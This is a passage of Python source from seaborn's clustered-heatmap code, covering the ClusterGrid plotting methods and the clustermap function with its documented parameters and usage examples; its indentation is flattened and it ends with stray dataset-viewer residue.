# Plot the column colors
if self.col_colors is not None:
matrix, cmap = self.color_list_to_matrix_and_cmap(
self.col_colors, xind, axis=1)
# Get col_color labels
if self.col_color_labels is not None:
col_color_labels = self.col_color_labels
else:
col_color_labels = False
heatmap(matrix, cmap=cmap, cbar=False, ax=self.ax_col_colors,
xticklabels=False, yticklabels=col_color_labels, **kws)
# Adjust rotation of labels, place on right side
if col_color_labels is not False:
self.ax_col_colors.yaxis.tick_right()
plt.setp(self.ax_col_colors.get_yticklabels(), rotation=0)
else:
despine(self.ax_col_colors, left=True, bottom=True)
def plot_matrix(self, colorbar_kws, xind, yind, **kws):
self.data2d = self.data2d.iloc[yind, xind]
self.mask = self.mask.iloc[yind, xind]
# Try to reorganize specified tick labels, if provided
xtl = kws.pop("xticklabels", "auto")
try:
xtl = np.asarray(xtl)[xind]
except (TypeError, IndexError):
pass
ytl = kws.pop("yticklabels", "auto")
try:
ytl = np.asarray(ytl)[yind]
except (TypeError, IndexError):
pass
# Reorganize the annotations to match the heatmap
annot = kws.pop("annot", None)
if annot is None:
pass
else:
if isinstance(annot, bool):
annot_data = self.data2d
else:
annot_data = np.asarray(annot)
if annot_data.shape != self.data2d.shape:
err = "`data` and `annot` must have same shape."
raise ValueError(err)
annot_data = annot_data[yind][:, xind]
annot = annot_data
# Setting ax_cbar=None in clustermap call implies no colorbar
kws.setdefault("cbar", self.ax_cbar is not None)
heatmap(self.data2d, ax=self.ax_heatmap, cbar_ax=self.ax_cbar,
cbar_kws=colorbar_kws, mask=self.mask,
xticklabels=xtl, yticklabels=ytl, annot=annot, **kws)
ytl = self.ax_heatmap.get_yticklabels()
ytl_rot = None if not ytl else ytl[0].get_rotation()
self.ax_heatmap.yaxis.set_ticks_position('right')
self.ax_heatmap.yaxis.set_label_position('right')
if ytl_rot is not None:
ytl = self.ax_heatmap.get_yticklabels()
plt.setp(ytl, rotation=ytl_rot)
tight_params = dict(h_pad=.02, w_pad=.02)
if self.ax_cbar is None:
self.fig.tight_layout(**tight_params)
else:
# Turn the colorbar axes off for tight layout so that its
# ticks don't interfere with the rest of the plot layout.
# Then move it.
self.ax_cbar.set_axis_off()
self.fig.tight_layout(**tight_params)
self.ax_cbar.set_axis_on()
self.ax_cbar.set_position(self.cbar_pos)
def plot(self, metric, method, colorbar_kws, row_cluster, col_cluster,
row_linkage, col_linkage, tree_kws, **kws):
# heatmap square=True sets the aspect ratio on the axes, but that is
# not compatible with the multi-axes layout of clustergrid
if kws.get("square", False):
msg = "``square=True`` ignored in clustermap"
warnings.warn(msg)
kws.pop("square")
colorbar_kws = {} if colorbar_kws is None else colorbar_kws
self.plot_dendrograms(row_cluster, col_cluster, metric, method,
row_linkage=row_linkage, col_linkage=col_linkage,
tree_kws=tree_kws)
try:
xind = self.dendrogram_col.reordered_ind
except AttributeError:
xind = np.arange(self.data2d.shape[1])
try:
yind = self.dendrogram_row.reordered_ind
except AttributeError:
yind = np.arange(self.data2d.shape[0])
self.plot_colors(xind, yind, **kws)
self.plot_matrix(colorbar_kws, xind, yind, **kws)
return self
def clustermap(data, pivot_kws=None, method='average', metric='euclidean',
z_score=None, standard_scale=None, figsize=(10, 10),
cbar_kws=None, row_cluster=True, col_cluster=True,
row_linkage=None, col_linkage=None,
row_colors=None, col_colors=None, mask=None,
dendrogram_ratio=.2, colors_ratio=0.03,
cbar_pos=(.02, .8, .05, .18), tree_kws=None,
**kwargs):
"""Plot a matrix dataset as a hierarchically-clustered heatmap.
Parameters
----------
data: 2D array-like
Rectangular data for clustering. Cannot contain NAs.
pivot_kws : dict, optional
If `data` is a tidy dataframe, can provide keyword arguments for
pivot to create a rectangular dataframe.
method : str, optional
Linkage method to use for calculating clusters.
See scipy.cluster.hierarchy.linkage documentation for more information:
https://docs.scipy.org/doc/scipy/reference/generated/scipy.cluster.hierarchy.linkage.html
metric : str, optional
Distance metric to use for the data. See
scipy.spatial.distance.pdist documentation for more options
https://docs.scipy.org/doc/scipy/reference/generated/scipy.spatial.distance.pdist.html
To use different metrics (or methods) for rows and columns, you may
construct each linkage matrix yourself and provide them as
{row,col}_linkage.
z_score : int or None, optional
Either 0 (rows) or 1 (columns). Whether or not to calculate z-scores
for the rows or the columns. Z scores are: z = (x - mean)/std, so
values in each row (column) will get the mean of the row (column)
subtracted, then divided by the standard deviation of the row (column).
This ensures that each row (column) has mean of 0 and variance of 1.
standard_scale : int or None, optional
Either 0 (rows) or 1 (columns). Whether or not to standardize that
dimension, meaning for each row or column, subtract the minimum and
divide each by its maximum.
figsize: (width, height), optional
Overall size of the figure.
cbar_kws : dict, optional
Keyword arguments to pass to ``cbar_kws`` in ``heatmap``, e.g. to
add a label to the colorbar.
{row,col}_cluster : bool, optional
If True, cluster the {rows, columns}.
{row,col}_linkage : numpy.array, optional
Precomputed linkage matrix for the rows or columns. See
scipy.cluster.hierarchy.linkage for specific formats.
{row,col}_colors : list-like or pandas DataFrame/Series, optional
List of colors to label for either the rows or columns. Useful to
evaluate whether samples within a group are clustered together. Can
use nested lists or DataFrame for multiple color levels of labeling.
If given as a DataFrame or Series, labels for the colors are extracted
from the DataFrames column names or from the name of the Series.
DataFrame/Series colors are also matched to the data by their
index, ensuring colors are drawn in the correct order.
mask : boolean array or DataFrame, optional
If passed, data will not be shown in cells where ``mask`` is True.
Cells with missing values are automatically masked. Only used for
visualizing, not for calculating.
{dendrogram,colors}_ratio: float, or pair of floats, optional
Proportion of the figure size devoted to the two marginal elements. If
a pair is given, they correspond to (row, col) ratios.
cbar_pos : (left, bottom, width, height), optional
Position of the colorbar axes in the figure. Setting to ``None`` will
disable the colorbar.
tree_kws : dict, optional
Parameters for the :class:`matplotlib.collections.LineCollection`
that is used to plot the lines of the dendrogram tree.
kwargs : other keyword arguments
All other keyword arguments are passed to :func:`heatmap`
Returns
-------
clustergrid : ClusterGrid
A ClusterGrid instance.
Notes
-----
The returned object has a ``savefig`` method that should be used if you
want to save the figure object without clipping the dendrograms.
To access the reordered row indices, use:
``clustergrid.dendrogram_row.reordered_ind``
Column indices, use:
``clustergrid.dendrogram_col.reordered_ind``
Examples
--------
Plot a clustered heatmap:
.. plot::
:context: close-figs
>>> import seaborn as sns; sns.set(color_codes=True)
>>> iris = sns.load_dataset("iris")
>>> species = iris.pop("species")
>>> g = sns.clustermap(iris)
Change the size and layout of the figure:
.. plot::
:context: close-figs
>>> g = sns.clustermap(iris,
... figsize=(7, 5),
... row_cluster=False,
... dendrogram_ratio=(.1, .2),
... cbar_pos=(0, .2, .03, .4))
Add colored labels to identify observations:
.. plot::
:context: close-figs
>>> lut = dict(zip(species.unique(), "rbg"))
>>> row_colors = species.map(lut)
>>> g = sns.clustermap(iris, row_colors=row_colors)
Use a different colormap and adjust the limits of the color range:
.. plot::
:context: close-figs
>>> g = sns.clustermap(iris, cmap="mako", vmin=0, vmax=10)
Use a different similarity metric:
.. plot::
:context: close-figs
>>> g = sns.clustermap(iris, metric="correlation")
Use a different clustering method:
.. plot::
:context: close-figs
>>> g = sns.clustermap(iris, method="single")
Standardize the data within the columns:
.. plot::
:context: close-figs
>>> g = sns.clustermap(iris, standard_scale=1)
Normalize the data within the rows:
.. plot::
:context: close-figs
>>> g = sns.clustermap(iris, z_score=0, cmap="vlag")
"""
plotter = ClusterGrid(data, pivot_kws=pivot_kws, figsize=figsize,
row_colors=row_colors, col_colors=col_colors,
z_score=z_score, standard_scale=standard_scale,
mask=mask, dendrogram_ratio=dendrogram_ratio,
colors_ratio=colors_ratio, cbar_pos=cbar_pos)
return plotter.plot(metric=metric, method=method,
colorbar_kws=cbar_kws,
row_cluster=row_cluster, col_cluster=col_cluster,
row_linkage=row_linkage, col_linkage=col_linkage,
tree_kws=tree_kws, **kwargs)
| 36.732852 | 97 | 0.593592 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.